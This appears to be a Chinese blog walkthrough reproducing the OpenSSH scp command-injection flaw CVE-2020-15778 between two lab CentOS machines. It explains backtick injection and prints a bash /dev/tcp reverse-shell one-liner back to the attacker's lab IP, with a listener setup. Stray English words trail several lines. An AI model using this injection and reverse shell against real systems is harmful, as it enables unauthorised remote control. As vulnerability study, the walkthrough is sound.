OpenSSH 8.3p1及以前版本中的scp容許在scp.c遠程功能中注入命令,攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。linux
參考連接:https://github.com/cpandya2909/CVE-2020-15778git
攻擊機:Centos7.6 10.10.10.133github
靶機:Centos7.6 10.10.10.134shell
首先確認靶機OpenSSH版本是否在漏洞影響範圍安全
scp是 linux 系統下基於 ssh 登錄進行安全的遠程文件拷貝命令,命令格式:bash
scp local_file remote_username@remote_ip:remote_file
攻擊機在當前目錄下建立一個拷貝用的測試文件test.txtssh
遠程拷貝文件tcp
能夠看到,在靶機上對比以前已經有拷貝過去的文件了測試
經過特殊符號 ` 進行遠程命令注入攻擊blog
命令執行成功
便可以在``內實現任意遠程命令執行,甚至是從網上下載準備好的後門或者其餘惡意程序
命令格式:
bash -i >&/dev/tcp/10.10.10.133/6666 0>&1
命令解析
命令 | 解釋 |
bash -i | 產生一個交互式bash |
>& /dev/tcp/ip/port | 創建TCP鏈接,並將標準輸出和錯誤重定向到TCP鏈接 |
0>&1 | 從TCP鏈接獲取輸入 |
打開攻擊機監聽端口,如6666
firewall-cmd --zone=public --add-port=6666/tcp --permanent
新開一個窗口開啓監聽
攻擊機原窗口進行反彈shell命令注入攻擊
執行成功,成功回顯
此漏洞利用有必定的侷限性,須要經過SSH身份認證。可是該漏洞影響範圍很是廣,且官方還沒有發佈安全更新補丁,請持續關注。